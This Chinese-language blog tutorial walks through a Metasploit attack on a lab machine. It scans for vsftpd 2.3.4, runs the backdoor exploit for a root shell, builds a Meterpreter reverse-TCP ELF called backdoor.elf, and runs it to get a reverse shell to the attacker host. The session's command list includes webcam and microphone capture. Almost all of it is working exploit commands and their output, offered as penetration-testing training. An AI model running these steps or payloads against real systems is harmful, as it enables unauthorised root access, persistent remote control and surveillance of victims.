Metasploit实战:FTP漏洞利用
2019-07-09 本文已影响41人
DreamsonMa
本章节介绍使用Metasploit对FTP漏洞进行渗透测试。
首先,配置一个postgresql实例。
1、启动postgresql
➜ ~ systemctl start postgresql
➜ ~ systemctl status postgresql
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled;
Active: active (exited) since Mon 2019-07-08 11:16:50 EDT; 11s ago
Process: 3069 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 3069 (code=exited, status=0/SUCCESS)
Jul 08 11:16:50 kali systemd[1]: Starting PostgreSQL RDBMS...
Jul 08 11:16:50 kali systemd[1]: Started PostgreSQL RDBMS.
➜ ~ systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.
2、创建用户msf,密码123456
3、创建数据库msf
➜ ~ sudo -u postgres psql
psql (11.1 (Debian 11.1-2))
Type "help" for help.
postgres=# create user "msf" with password '123456' nocreatedb;
CREATE ROLE
postgres=# create database "msf" with owner="msf";
CREATE DATABASE
第二步,使用Metasploit进行渗透。
1、登录msfconsole控制台
➜ ~ msfconsole
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
msf5 >
2、连接一个db实例
msf5 > db_connect msf:123456@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: zF0rip8x.
3、使用nmap探测目标FTP
msf5 > db_nmap -sV -p 21 10.0.2.5
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 11:34 EDT
[*] Nmap: Nmap scan report for 10.0.2.5
[*] Nmap: Host is up (0.00037s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: OS: Unix
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
4、查看一下数据库探测记录
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.2.5 21 tcp ftp open vsftpd 2.3.4
10.0.2.5 2121 tcp ftp open ProFTPD 1.3.1
5、搜索漏洞代码
msf5 > search vsftpd 2.3.4
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
6、设置payload相关配置
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set playload cmd/unix/interact
playload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
7、查看配置是否成功
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
8、执行exploit攻击,获得shell
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER: 331 Please specify the password.
[+] 10.0.2.5:21 - Backdoor service has been spawned, handling...
[+] 10.0.2.5:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.2.12:41947 -> 10.0.2.5:6200) at 2019-07-08 11:44:36 -0400
whoami
root
id
uid=0(root) gid=0(root)
pwd
/
第三步,注入更强大的Metapreter的PayLoad
1、查找payload
➜ ~ msfvenom --list payloads | grep linux | grep meterpreter| grep x86 | grep reverse_tcp
linux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
2、查看payload参数设置
➜ ~ msfvenom -p linux/x86/meterpreter_reverse_tcp --list-options
Options for payload/linux/x86/meterpreter_reverse_tcp:
=========================
Name: Linux Meterpreter, Reverse TCP Inline
Module: payload/linux/x86/meterpreter_reverse_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 1022972
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
3、创建payload
➜ ~ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.0.2.12 -f elf > /tmp/backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1022972 bytes
Final size of elf file: 1022972 bytes
4、启动监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.2.12
LHOST => 10.0.2.12
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.12:4444
5、利用FTP漏洞上传payload,参考文章《FTP漏洞原理及利用》
6、利用第二步获得的shell执行漏洞
chmod +x /tmp/backdoor.elf
chown root. /tmp/backdoor.elf
ls -l /tmp
total 1004
-rw------- 1 tomcat55 nogroup 0 Jul 8 10:41 4480.jsvc_up
-rwxr--r-- 1 root root 1022972 Jul 8 12:07 backdoor.elf
/tmp/backdoor.elf
7、获取到反弹shell(可以执行meterpreter命令的哟!)
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:42620) at 2019-07-08 12:18:42 -0400
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getpid
Current pid: 4909
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Mic Commands
====================
Command Description
------- -----------
listen listen to a saved audio recording via audio player
mic_list list all microphone interfaces
mic_start start capturing an audio stream from the target mic
mic_stop stop capturing audio
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
推荐汇总贴: 漏洞利用套路汇总